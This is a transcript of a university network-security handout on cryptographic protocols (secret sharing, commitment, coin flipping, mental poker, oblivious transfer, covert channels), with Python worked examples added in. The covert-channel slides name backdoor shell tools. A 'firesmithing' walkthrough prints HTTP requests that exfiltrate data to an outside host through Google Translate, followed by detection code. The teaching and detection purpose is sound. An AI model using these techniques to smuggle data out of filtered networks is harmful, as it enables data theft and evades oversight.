#### Transcript security engineering - University of Sydney

ELEC5616 computer and network security
matt barrie [email protected]
CNS2010 handout 13 :: crypto protocols II 1

##### secret splitting

Problem:

- You are the CEO of Coca-Cola. You are responsible for bringing a refreshing taste to gajillions of people all over the world, but want to keep the recipe secret from Pepsi's industrial spies.
- You could tell your most trusted employees
  - they could defect to the opposition
  - they could fall to rubber hose cryptanalysis
- How can we split a secret among two parties where each piece by itself is useless?

##### secret splitting

Simple (XOR) algorithm. Assume Trent wishes to protect the message m:

- Trent generates a random bit string r, the same length as m.
- Trent computes s = m ⊕ r.
- Trent gives Alice r.
- Trent gives Bob s.
- Each of the pieces is called a shadow.
- To reconstruct m, Alice and Bob XOR their shadows together: r ⊕ s = r ⊕ m ⊕ r = m.
- If r is truly random, the system is perfectly secure: each shadow on its own is a one-time-pad encryption of m and reveals nothing about it.
- To extend the scheme to n people, generate n−1 random bit strings and XOR all of them with m to form the last shadow, e.g. for four people m ⊕ r ⊕ s ⊕ t = u, and r, s, t, u are the four shadows.

##### secret splitting

- Secret splitting aims to enhance reliability without increasing risk by distributing trust.

Issues:

- The system is adjudicated by Trent
  - Trent can hand out rubbish and claim it's part of the secret
  - He can hand out a piece to Alice, Bob, Carol and Dave, and later tell everyone that only the first three pieces are needed and Dave is fired
- All parties know the length of the message
  - it is the same length as their piece of the secret
- The message is malleable
  - e.g. Alice can manipulate her shadow to "blind" it or alter bits of m in a known way: flipping a bit of her shadow flips the same bit of the reconstructed message, and nothing in the scheme detects it
- All parties are required to recover the message (bus factor = 1)

##### secret sharing

Problem:

- You are responsible for a small third-world country's nuclear weapons program.
- You want to ensure that no single lunatic can launch a missile.
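The XOR splitting scheme above and Shamir's (t,n)-threshold scheme described on the following slides, as an added worked example (this code is not part of the handout). It assumes a constructed 127-bit prime modulus for Shamir, 1-based share indices, and a toy "secret recipe" / "launch code" as sample secrets; the malleability function shows the issue from the third slide, where a share holder flips one bit of the reconstructed message without anyone noticing.

```python
from __future__ import annotations
import secrets

# ---------- n-of-n secret splitting with XOR ----------
def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def xor_split(m: bytes, n: int) -> list[bytes]:
    """Produce n shadows: n-1 random strings, plus m XOR all of them."""
    shadows = [secrets.token_bytes(len(m)) for _ in range(n - 1)]
    last = m
    for s in shadows:
        last = xor_bytes(last, s)
    return shadows + [last]

def xor_join(shadows: list[bytes]) -> bytes:
    """Recover m; every shadow is required (bus factor = 1)."""
    out = bytes(len(shadows[0]))
    for s in shadows:
        out = xor_bytes(out, s)
    return out

def xor_malleability_demo() -> bytes:
    """Alice flips one bit of her own shadow; the reconstructed message changes
    in exactly that bit and nobody can detect it (the scheme has no integrity)."""
    m = b"secret recipe"                          # constructed sample secret
    r, s = xor_split(m, 2)
    r_tampered = bytes([r[0] ^ 0x20]) + r[1:]     # 's' ^ 0x20 == 'S'
    return xor_join([r_tampered, s])              # b"Secret recipe"

# ---------- Shamir (t, n) threshold sharing over GF(p) ----------
P = 2**127 - 1   # prime modulus; must exceed both the secret and n (constructed choice)

def shamir_split(m: int, t: int, n: int, p: int = P) -> list[tuple[int, int]]:
    """Trent: f(x) = m + a1*x + ... + a_{t-1}*x^{t-1} mod p; share i is (i, f(i))."""
    if not (0 <= m < p and 1 <= t <= n < p):
        raise ValueError("need 0 <= m < p and 1 <= t <= n < p")
    coeffs = [m] + [secrets.randbelow(p) for _ in range(t - 1)]   # a0 = m
    def f(x: int) -> int:
        return sum(a * pow(x, j, p) for j, a in enumerate(coeffs)) % p
    return [(x, f(x)) for x in range(1, n + 1)]   # distinct, non-zero x_i

def shamir_recover(shares: list[tuple[int, int]], p: int = P) -> int:
    """Lagrange interpolation evaluated at x = 0 returns a0 = m (needs >= t shares)."""
    xs = [x for x, _ in shares]
    if len(set(xs)) != len(xs) or 0 in xs:
        raise ValueError("shares must have distinct non-zero x")
    total = 0
    for xi, yi in shares:
        num = den = 1
        for xj in xs:
            if xj != xi:
                num = num * (-xj) % p          # factor (0 - xj)
                den = den * (xi - xj) % p      # factor (xi - xj)
        total = (total + yi * num * pow(den, -1, p)) % p
    return total

def shamir_demo() -> tuple[bool, bool, bool]:
    m = int.from_bytes(b"launch code", "big")     # constructed sample secret
    shares = shamir_split(m, t=3, n=5)
    any_three = shamir_recover([shares[0], shares[2], shares[4]]) == m
    all_five = shamir_recover(shares) == m
    only_two = shamir_recover(shares[:2]) == m    # wrong with probability 1 - 1/p
    return any_three, all_five, only_two          # (True, True, False)
```

With only t−1 shares the interpolation still produces a value, but it is the constant term of some other degree-(t−1) polynomial through those points; every candidate secret is equally consistent with what the two holders have, which is the information-theoretic guarantee the slides rely on.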
- You want to ensure that no two lunatics can collude to launch a missile.
- You want at least three of five officers to be lunatics before a missile can be launched (bus factor = 3).
- We call this a (3,5)-threshold scheme.

##### shamir's (t,n)-threshold scheme

- Based on polynomial interpolation, and the fact that a polynomial y = f(x) of degree t−1 is uniquely defined by t points (x, y).
- Trent wishes to distribute message m amongst n users, where any group of t users can recover m (bus factor = n−t+1).

Setup:

- Trent chooses a prime p > max(m, n).
- Trent sets a0 = m.
- Trent selects t−1 random, independent coefficients a1 … a(t−1) (0 ≤ aj ≤ p−1), defining the polynomial f(x) = a0 + a1·x + a2·x² + … + a(t−1)·x^(t−1) (mod p).
- Trent computes yi = f(xi) mod p for n distinct points 1 ≤ xi ≤ p−1: any points on the curve, as long as no xi is 0 and no two coincide.
- Trent sends share (xi, yi) to user i.

##### shamir's (t,n)-threshold scheme

Pooling of shares:

- Any t users can get together and pool their distinct points (xi, yi).
- Since any t points are enough to define the polynomial, the coefficients aj can be computed using Lagrange interpolation.
- The message m can be found by the fact that f(0) = a0 = m.
- Fewer than t points are consistent with exactly one polynomial for every possible value of a0, so t−1 shares reveal nothing about m.

##### bit commitment

Problem:

- Alice wants to sell Bob information regarding police informants within his Mafia empire.
- Alice doesn't trust Bob enough to tell him the rats without getting paid first (they might suddenly disappear).
- Bob thinks that the deal is a police setup, and won't give her the money until she commits to names.

##### bit commitment

Commitment:

- Bob → Alice: random r
- Alice → Bob: {r | m}k

Revelation:

- Alice → Bob: k
- Bob decrypts the message and verifies r

Discussion:

- The random value r is used for freshness and to stop Alice from finding two messages and two keys where {m}k1 == {m'}k2 – i.e.
forcing Alice to commit to a single m.
- Bob does not know k until revelation so cannot brute force the message space.

##### bit commitment with hash functions

Commitment:

- Alice generates random r1, r2
- Alice → Bob: r1 and x = h(r1, r2, m) [x is called a blob]

Revelation:

- Alice → Bob: r1, r2, m
- Bob hashes (r1, r2, m) and compares it to x

Discussion:

- Bob does not have to send any messages: Alice sends a message to commit and a message to reveal.
- Alice cannot find an r3 (or a different message m') such that h(r1, r3, m') == h(r1, r2, m), so the blob binds her to m; this needs h to be collision resistant.
- The value r2 is kept secret so Bob can't brute force the message space; this is what makes the blob hide m.

##### fair coin flipping

Problem:

- Alice and Bob are arguing on the Internet over who will be white in a game of online chess.
- They agree to flip a coin to resolve the situation.
- Alice doesn't trust Bob to flip the coin.
- Bob doesn't trust Alice to flip the coin.
- How can we flip a coin fairly?

##### fair coin flipping

Solution:

- Alice commits to a random bit b using a bit commitment scheme and sends the blob y = f(b) to Bob.
- Bob tries to guess the bit.
- Alice reveals b (opens the commitment) so Bob can check the blob.
- If Bob guessed correctly then Bob wins the toss.
- If Bob guessed incorrectly then Alice wins the toss.

Discussion:

- The security of the algorithm rests on the security of the function f(x) used to generate the blob.
- The least significant bit of f(x) must not correlate with x.
  - Similar to the reason why we hash the result of the Diffie-Hellman exchange to obtain a session key rather than taking the last n bits.

##### fair coin flipping using public key crypto

- Requires that the algorithm commutes, e.g. RSA with identical moduli: EB(EA(m)) = EA(EB(m)), so DA(EB(EA(m))) = EB(m).
- Caveat: with one shared RSA modulus, whoever knows φ(n) (which each party needs to compute their own private exponent) can also compute the other party's private exponent from the published public one, so the key pairs must be fresh for each protocol run (they are revealed at the end anyway).

Algorithm:

- Alice and Bob generate public/private key pairs.
- Alice generates two random numbers rT, rH.
- Alice → Bob: m1 = EA("heads", rH), m2 = EA("tails", rT)
- Bob selects one of the two messages at random; call its plaintext x, so the message he picked is EA(x).
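The hash-based commitment and the commitment-based coin flip from the slides above, as an added worked example (this is not code from the handout). It assumes SHA-256 as h, 16-byte r1 and r2 (fixed length, so concatenating r1 ‖ r2 ‖ m is unambiguous), and a one-byte encoding of the committed bit; the last two functions show the two properties the discussion bullets rely on: the blob is binding (Alice cannot open it as the other bit) and hiding (Bob cannot brute force it unless r2 leaks).

```python
from __future__ import annotations
import hashlib
import hmac
import secrets

def commit(m: bytes) -> tuple[bytes, bytes, bytes]:
    """Alice: blob x = h(r1, r2, m). She sends r1 and x; r2 stays secret until she reveals."""
    r1, r2 = secrets.token_bytes(16), secrets.token_bytes(16)
    x = hashlib.sha256(r1 + r2 + m).digest()
    return x, r1, r2

def verify_opening(x: bytes, r1: bytes, r2: bytes, m: bytes) -> bool:
    """Bob: recompute h(r1, r2, m) and compare it with the blob."""
    return hmac.compare_digest(hashlib.sha256(r1 + r2 + m).digest(), x)

def coin_flip(alice_bit: int, bob_guess: int) -> tuple[str, bool]:
    """Commitment-based coin flip. Returns (winner, opening_verified)."""
    bit = bytes([alice_bit])
    x, r1, r2 = commit(bit)                          # Alice -> Bob: r1, x
    # Bob -> Alice: bob_guess (with only r1 and x in hand, guessing is all he can do)
    ok = verify_opening(x, r1, r2, bit)              # Alice -> Bob: r1, r2, bit; Bob checks
    if not ok:
        return "abort", False                        # Alice's opening does not match her blob
    return ("Bob" if bob_guess == alice_bit else "Alice"), True

def alice_tries_to_cheat(alice_bit: int) -> bool:
    """After hearing Bob's guess, Alice tries to open the blob as the other bit.
    With a collision-resistant h this fails: the blob is binding."""
    x, r1, r2 = commit(bytes([alice_bit]))
    return verify_opening(x, r1, r2, bytes([1 - alice_bit]))

def bob_brute_force(x: bytes, r1: bytes, r2: bytes | None) -> int | None:
    """Bob tries both possible bits against the blob. Without r2 there are 2^128
    candidate openings per bit, so the blob hides b; if r2 leaks, it does not."""
    if r2 is None:
        return None
    for b in (0, 1):
        if verify_opening(x, r1, r2, bytes([b])):
            return b
    return None
```

Usage: `coin_flip(secrets.randbelow(2), secrets.randbelow(2))` runs one fair toss; `alice_tries_to_cheat(0)` returns `False`, and `bob_brute_force(x, r1, None)` returns `None` while the same call with the real `r2` returns the committed bit.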
- Bob → Alice: EB(EA(x))
- Alice → Bob: DA(EB(EA(x))) = EB(x)
- Bob computes DB(EB(x)) = x and learns the result.
- Bob → Alice: x

##### fair coin flipping using public key crypto

- Alice verifies that x is one of the two random strings.
- Alice and Bob reveal to each other their key pairs to ensure that neither cheated.

Discussion:

- The algorithm is self-enforcing. Either party can detect cheating by the other without a TTP.
- Note: Bob learns the result of the coin flip before Alice. Although he can't change it, he may delay the result on purpose to take advantage of the situation
  - otherwise known as Bob flipping the coin into a well.
- Coin flipping has use in session key generation as neither party can influence the result of each flip (i.e. bit)
  - e.g. in Diffie-Hellman one party selects an exponent after the first.

##### mental poker

Problem:

- Alice and Bob want to play poker over email.
- Alice doesn't trust Bob.
- Bob doesn't trust Alice.
- How can Alice and Bob be dealt hands fairly?

##### mental poker

Solution:

- Alice and Bob use a commutative public key cryptosystem: DA(EB(EA(m))) = EB(m).
- Alice encrypts 52 messages m1 = ("Ace of Spades", r1) … using her public key.
- Alice sends the blobs to Bob.
- Bob picks 5 of these at random, encrypts them with his public key and sends them back to Alice.
- Alice decrypts the messages with her private key and sends them back to Bob.
- Bob decrypts the messages with his private key to determine his hand.
- At the end of the game, Alice and Bob reveal their key pairs to ensure neither cheated.

##### attacks against poker schemes

- Since some cryptographic algorithms are not truly random processes, they tend to leak small amounts of information.
- In RSA, for example, the public exponent is odd, so quadratic residuosity is preserved by encryption: if the number representing the card is a quadratic residue, then the encryption of the card is also a quadratic residue.
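The commutative-cipher coin flip, the mental poker deal and the quadratic-residue leak from the slides above, as one added worked example (not code from the handout). Rather than RSA with a shared modulus, it uses the Pohlig–Hellman style exponentiation cipher over a public prime p (the SRA mental-poker construction): each party picks an exponent e coprime to p−1 and keeps d = e⁻¹ mod (p−1); because exponentiation commutes, EB(EA(m)) = EA(EB(m)) exactly as the slides require, and because p is public neither party learns the other's d. Assumptions: a constructed 127-bit prime, two-character card labels ("AS", "TH", …) and an 8-byte random pad as the ri; the last function shows the slide's leak, since an odd exponent cannot change whether a value is a quadratic residue.

```python
from __future__ import annotations
import secrets
from math import gcd

P = 2**127 - 1                 # public prime modulus shared by Alice and Bob (constructed)
RNG = secrets.SystemRandom()

def keygen(p: int = P) -> tuple[int, int]:
    """Exponent e coprime to p-1 and d = e^-1 mod (p-1), so (m^e)^d = m mod p."""
    while True:
        e = RNG.randrange(3, p - 1)
        if gcd(e, p - 1) == 1:          # p-1 is even, so any such e is odd
            return e, pow(e, -1, p - 1)

def E(m: int, key: int, p: int = P) -> int:
    """Encrypt (with e) or decrypt (with d): plain modular exponentiation, which commutes."""
    return pow(m, key, p)

def encode(label: str, pad: bytes) -> int:
    """(label, r) as an integer < p: label bytes followed by an 8-byte random pad."""
    return int.from_bytes(label.encode() + pad, "big")

def decode(x: int) -> str:
    return x.to_bytes(16, "big").lstrip(b"\0")[:-8].decode()

def coin_flip() -> str:
    eA, dA = keygen()
    eB, dB = keygen()
    plaintexts = {encode(lbl, secrets.token_bytes(8)): lbl for lbl in ("heads", "tails")}
    blobs = [E(x, eA) for x in plaintexts]      # Alice -> Bob: EA("heads", rH), EA("tails", rT)
    chosen = RNG.choice(blobs)                  # Bob picks one at random
    both = E(chosen, eB)                        # Bob -> Alice: EB(EA(x))
    bob_only = E(both, dA)                      # Alice -> Bob: DA(EB(EA(x))) = EB(x)
    x = E(bob_only, dB)                         # Bob learns x first (the coin is "in the well")
    if x not in plaintexts:                     # Bob -> Alice: x; Alice verifies it is hers
        raise ValueError("Bob returned a string Alice never sent")
    return plaintexts[x]

CARDS = [r + s for s in "SHDC" for r in "A23456789TJQK"]   # 52 labels, e.g. "AS", "TH"

def deal(hand_size: int = 5) -> list[str]:
    eA, dA = keygen()
    eB, dB = keygen()
    deck = {encode(c, secrets.token_bytes(8)): c for c in CARDS}
    blobs = [E(x, eA) for x in deck]                  # Alice -> Bob: 52 blobs
    picked = RNG.sample(blobs, hand_size)             # Bob chooses his cards ...
    back = [E(E(b, eB), dA) for b in picked]          # ... adds his layer, Alice removes hers
    return [decode(E(b, dB)) for b in back]           # Bob removes his layer and reads his hand

def legendre(x: int, p: int = P) -> int:
    """Euler's criterion: 1 if x is a quadratic residue mod p, p-1 if it is not."""
    return pow(x, (p - 1) // 2, p)

def qr_status_leaks(p: int = P) -> bool:
    """The dealer's exponent e is odd, so legendre(x^e) == legendre(x)^e == legendre(x):
    whether a card is a QR can be read straight off its blob without decrypting."""
    eA, _ = keygen(p)
    x = encode("AS", secrets.token_bytes(8))
    return legendre(x, p) == legendre(E(x, eA, p), p)
```

`deal()` returns a five-card hand that only Bob can read; `qr_status_leaks()` returns `True`, which is exactly the property a malicious dealer would exploit to mark the Aces. The SRA construction inherits this leak just as RSA does, since both rely on an odd exponent; the usual fix is to only encrypt values whose residuosity carries no information (for example, pick each ri so that every card blob is a quadratic residue).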
- Remember that x is a quadratic residue (QR) mod p if y² ≡ x (mod p) has a solution.
- This could be used by a malicious dealer to "mark" some cards (e.g. the Aces), since a card's QR status survives encryption and can be read off its blob.

##### oblivious transfer

Problem (Kilian):

- Bob is trying to factor a 2000-bit number, n.
- Alice wants to sell Bob a 1000-bit factor for $1000 (at a very reasonable $1/bit).
- Bob only has $500 and offers to buy half the bits, but only if Alice proves that the number is a factor of n, and Alice won't know which bits Bob bought.
- How can the deal be done, given that Alice cannot prove her number is a factor of n without telling it to Bob?

##### oblivious transfer

Algorithm:

- Alice generates two public/private key pairs (EA1, DA1) and (EA2, DA2).
- Alice → Bob: EA1, EA2
- Bob generates a symmetric cipher key, k.
- Bob picks one of Alice's public keys, EX, at random and encrypts k with it.
- Bob → Alice: {k}EX
- Alice decrypts the key twice, DA1({k}EX) and DA2({k}EX), resulting in k and garbage DY({k}EX). Alice does not know which is the real key.
- Alice sends Bob two messages, half the bits each: {"first 500 bits"} and {"second 500 bits"}, each encrypted with one of these two keys.
- Bob decrypts both with k. One message will make sense to him.
- Bob now has one of the messages. Alice has no idea which one.

##### oblivious transfer

Discussion:

- Alice still needs to convince Bob that the message is a factor of n. She does that using a zero-knowledge proof (remember: a way of Alice telling Bob that she knows x without revealing any information about x).
- Oblivious transfer is a way Alice can send a bit to Bob in such a way that Bob receives the bit with probability 0.5 and Alice does not know whether it was received or not (i.e. "I have one secret and you get it with probability 0.5").
- This can be extended to "I have two secrets and you get one", "I have n secrets and you get one", etc.
- Oblivious transfer is not used alone.
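The 1-out-of-2 oblivious transfer from the algorithm slide above, as an added worked example (not code from the handout). It assumes two constructed textbook-RSA key pairs built from Mersenne primes (raw RSA on a random 128-bit k, no padding; fine for following the message flow, not for real use), a toy SHA-256 keystream as the symmetric cipher, and two constructed "halves" that Bob can recognise by a `half-` prefix; the interesting line is the one where Alice decrypts {k}EX under both private keys and gets k and garbage without being able to tell which is which.

```python
from __future__ import annotations
import hashlib
import secrets

E = 65537

def rsa_keypair(p: int, q: int) -> tuple[tuple[int, int], tuple[int, int]]:
    """Constructed RSA key pair: returns ((e, n), (d, n))."""
    n, phi = p * q, (p - 1) * (q - 1)
    return (E, n), (pow(E, -1, phi), n)

PUB1, PRIV1 = rsa_keypair(2**89 - 1, 2**107 - 1)     # EA1 / DA1 (Mersenne primes, demo only)
PUB2, PRIV2 = rsa_keypair(2**127 - 1, 2**61 - 1)     # EA2 / DA2 (no shared factors)

def rsa(x: int, key: tuple[int, int]) -> int:
    exp, n = key
    return pow(x, exp, n)

def stream_xor(key: bytes, data: bytes) -> bytes:
    """Toy symmetric cipher: XOR with a SHA-256 keystream. A wrong key yields garbage."""
    out = bytearray()
    for off in range(0, len(data), 32):
        block = hashlib.sha256(key + off.to_bytes(4, "big")).digest()
        out += bytes(a ^ b for a, b in zip(data[off:off + 32], block))
    return bytes(out)

def oblivious_transfer(halves: tuple[bytes, bytes], bob_choice: int) -> tuple[list[int], list[bytes]]:
    """1-out-of-2 OT as on the slide. Returns (indices Bob could read, his two decryptions)."""
    pubs, privs = (PUB1, PUB2), (PRIV1, PRIV2)
    # Bob: fresh symmetric key k, encrypted under whichever of Alice's public keys he chose
    k = secrets.randbelow(2**128)
    c = rsa(k, pubs[bob_choice])                                  # Bob -> Alice: {k}EX
    # Alice: decrypt under both private keys. One result is k, the other is DY({k}EX),
    # and nothing about c tells her which is which.
    candidates = [rsa(c, priv).to_bytes(32, "big") for priv in privs]
    # Alice -> Bob: half i encrypted under candidate key i
    cts = [stream_xor(kc, half) for kc, half in zip(candidates, halves)]
    # Bob: decrypt both with k; only the half encrypted under the real k makes sense
    kb = k.to_bytes(32, "big")
    plains = [stream_xor(kb, ct) for ct in cts]
    readable = [i for i, pt in enumerate(plains) if pt.startswith(b"half-")]
    return readable, plains

# Constructed stand-ins for the two 500-bit halves of Alice's factor.
HALVES = (b"half-1: bits 0..499 of the factor (constructed sample)",
          b"half-2: bits 500..999 of the factor (constructed sample)")
```

`oblivious_transfer(HALVES, 1)` returns `([1], ...)` with the second half intact and the first half as garbage; Alice, who only ever saw `c`, cannot distinguish the two runs. Note that Bob is trusted here to pick exactly one key: with textbook RSA nothing stops him from sending a value that decrypts sensibly under both, which is one reason this textbook OT is a teaching construction rather than a deployable one.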
It is used as a building block in other protocols.

##### subliminal channels

Problem:

- Alice and Bob have been arrested for conspiracy to factor large numbers by the government.
- Alice has been sent to a women's jail, Bob to a men's jail.
- The warden, Walter, is willing to let them communicate on the condition that messages are not encrypted.
- How can Alice and Bob communicate secretly, given that Walter might attempt to deceive both of them by planting false messages?

##### subliminal channels

- Alice and Bob set up a subliminal channel in their messages (otherwise known as a covert communications channel).
- On the simplest level, Alice and Bob could use steganography aka "stego" (information hiding). Note: stego is not crypto (although you can combine the two).
- Examples of this channel might be:
  - A '0' is sent if the number of words in a sentence is even.
  - A '1' is sent if the number of words in a sentence is odd.
- One might send an image in an email where the low order bit of each pixel is actually a message:
  - the low order bit is below the human perceptual threshold, so the change in image quality is not noticed.

##### spam mimic

- Disguise your message in spam: "Our cover is blown. Abort." becomes

> Dear Friend , This letter was specially selected to be sent to you . We will comply with all removal requests ! This mail is being sent in compliance with Senate bill 2016 ; Title 5 ; Section 304 ! This is not a get rich scheme ! Why work for somebody else when you can become rich in 67 WEEKS ! Have you ever noticed people love convenience & the baby boomers are more demanding than their parents ! Well, now is your chance to capitalize on this . WE will help YOU sell more and decrease perceived waiting time by 150% ! The best thing about our system is that it is absolutely risk free for you . But don't believe us .
> Ms Simpson of North Dakota tried us and says "I've been poor and I've been rich rich is better" . This offer is 100% legal . Because the Internet operates on "Internet time" you must make a commitment soon ! Sign up a friend and your friend will be rich too ! God Bless .

> Dear Internet user , This letter was specially selected to be sent to you ! We will comply with all removal requests ! This mail is being sent in compliance with Senate bill 1619 , Title 5 ; Section 301 . This is different than anything else you've seen . Why work for somebody else when you can become rich inside 77 WEEKS . Have you ever noticed the baby boomers are more demanding than their parents and nobody is getting any younger . Well, now is your chance to capitalize on this ! WE will help YOU increase customer response by 100% & SELL MORE . The best thing about our system is that it is absolutely risk free for you ! But don't believe us ! Mrs Simpson of Alabama tried us and says "Now I'm rich, Rich, RICH" ! We are a BBB member in good standing . We beseech you - act now ! Sign up a friend and you'll get a discount of 10% ! God Bless .

##### subliminal channels

- Loki
  - Daemon9, Alhambra (Phrack / the guild)
  - Bidirectional covert UNIX shell client using the data field in ICMP type 0 (Echo Reply) and type 8 (Echo Request) packets.
- Daemonshell-UDP
  - Reusable tunnel library
- B0CK
  - IGMP multicast messages used as transport
- Rwwwshell
  - Backdoor emits requests as HTTP Response packets
  - Output from commands returns from the slave as CGI-script HTTP GETs
- ICMP Backdoor
  - ICMP Echo Reply only (more stealthy)
  - Messages fragmented to look more like ping packets (multiples of 64 bytes)
- AckCmd
  - TCP ACK packets for request (port 80), TCP RESET packets for response (high port)

##### subliminal channels

- Covert channels inside TCP (HTTP, HTTPS, MSN) and UDP, communication channels over HTTP cookies!
  - www.gray-world.net
- g00gle CrewBots
  - Covert communications channel through google

##### firesmithing

- Quote: Firesmithing started when a customer told us "Dude, don't you think I'm safe? I disabled HTTP over SSL proxying and set up a white list of authorized websites my users can HTTP from the internal network. I feel like hackers won't be able to exfiltrate sensitive documents through the web, will they?"
- Let's get this straight:
  - Hosts are whitelisted
  - Host: headers in HTTP are checked against IP addresses to ensure they are correct
  - All ports are filtered
  - Users are forbidden from SSL encrypting their datastreams (to hide what they are doing)
  - All outgoing connections are filtered (say except for google)
- Can we exfiltrate data from the network?

##### firesmithing

- Unfortunately, yes.
- When you ask google to translate a web page, it sends a request to fetch it from the remote server, and then translates the content:

```
GET http://www.google.com/translate_c?hl=en&ie=UTF8&oe=UTF-8\
&langpair=en%7Ces&u=http://gray-world.net/?Firesmithing HTTP/1.1
Host: www.google.com

HTTP/1.1 302 Found
Location: http://[IPG00GLE]/translate_c?hl=en&ie=UTF-8&oe=UTF-8\
&langpair=en%7Ces&u=http://gray-world.net/?Firesmithing

GET http://[IPG00GLE]/translate_c?hl=en&ie=UTF-8&oe=UTF-8\
&langpair=en%7Ces&u=http://gray-world.net/?Firesmithing HTTP/1.1
Host: www.google.com

HTTP/1.1 200 OK
Content-Location: http://gray-world.net/
Server: TWS/0.9

[Translated content]
```

- [IPG00GLE] is the IP address of a google gateway server.

##### firesmithing

- Logfile on the remote server:

```
//------------------------------------------------------------------\\
[IPG00GLE] - - gray-world.net 193.239.120.148:80 [date]\
"GET /?Firesmithing HTTP/1.0" 200 7863 "-"\
"browser (via translate.google.com)"
\\------------------------------------------------------------------//
```

- We have just managed to send
"Firesmithing" via google to our remote server: the query string of the URL we asked google to translate was delivered by google to a host the whitelist would never have let us reach directly.
- More stuff including using personalised homepages, google calendar, gmail, the cache etc. here:
  - See: http://www.gray-world.net/projects/papers/gbots-1.0.txt

##### how do we protect against this?

- Start to see the problems with content filtering?
- Consider national content filters
  - Great Firewall of China (and similar filters in several Middle Eastern countries)
  - Australian Government NetAlert
- Corporate content filters
- Net-nannies
- What if malware used these techniques to communicate?
- Could other internets be layered onto the Internet?
  - Answer: they do

##### references

- Handbook of Applied Cryptography: read § 12.7 – 12.7.2, 12.9
- Spam Mimic: http://www.spammimic.com
- Phrack Magazine: www.phrack.org
- Gray World: www.gray-world.net
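Detection logic for the firesmithing exfiltration shown on the slides above, as an added example (not from the handout or from gray-world.net). It assumes a whitelist containing only www.google.com, constructed outbound-proxy request lines shaped like the slide's translate request, and constructed web-server log lines in the slide's format; on the proxy side it flags whitelisted requests whose query string smuggles a URL to a non-whitelisted host, and on the receiving side it pulls out what arrived "via translate.google.com".

```python
from __future__ import annotations
from urllib.parse import parse_qsl, urlsplit

WHITELIST = {"www.google.com"}

# Constructed outbound-proxy request lines (the first mirrors the slide's translate request).
PROXY_LOG = [
    "GET http://www.google.com/translate_c?hl=en&ie=UTF-8&oe=UTF-8&langpair=en%7Ces"
    "&u=http://gray-world.net/?Firesmithing HTTP/1.1",
    "GET http://www.google.com/search?q=elec5616+handout+13 HTTP/1.1",
    "GET http://www.google.com/translate_c?hl=en&u=http://www.google.com/intl/en/about.html HTTP/1.1",
]

# Constructed web-server log lines on the receiving end, in the slide's logfile format.
SERVER_LOG = [
    '[IPG00GLE] - - gray-world.net 193.239.120.148:80 [date] '
    '"GET /?Firesmithing HTTP/1.0" 200 7863 "-" "browser (via translate.google.com)"',
    '10.0.0.7 - - gray-world.net 193.239.120.148:80 [date] '
    '"GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

def embedded_fetches(request_lines: list[str], whitelist: set[str] = WHITELIST) -> list[tuple[str, str, str]]:
    """Proxy side: whitelisted requests whose parameters carry a URL to a non-whitelisted
    host. Returns (outer host, inner host, inner query) per hit; the inner query is the
    data that the whitelisted host would fetch, and thereby deliver, on the user's behalf."""
    hits = []
    for line in request_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        outer = urlsplit(parts[1])
        if outer.hostname not in whitelist:
            continue                        # the proxy already blocks these outright
        for _, value in parse_qsl(outer.query, keep_blank_values=True):
            if value.lower().startswith(("http://", "https://")):
                inner = urlsplit(value)
                if inner.hostname and inner.hostname not in whitelist:
                    hits.append((outer.hostname, inner.hostname, inner.query))
    return hits

def translate_proxied_hits(server_lines: list[str]) -> list[str]:
    """Receiving side: requests that arrived through google's translator, returning
    the query string that was smuggled out of the filtered network."""
    hits = []
    for line in server_lines:
        if "(via translate.google.com)" not in line:
            continue
        request = line.split('"')[1]        # e.g. 'GET /?Firesmithing HTTP/1.0'
        path = request.split()[1]
        hits.append(urlsplit(path).query)
    return hits
```

`embedded_fetches(PROXY_LOG)` flags only the first line: the second carries no URL and the third asks google to translate a google page, which stays inside the whitelist. The proxy-side check is the one that matters for the filter operator, since it works before any byte leaves the network; the server-side check is what the remote operator (or an investigator with their logs) would use to confirm the channel was used.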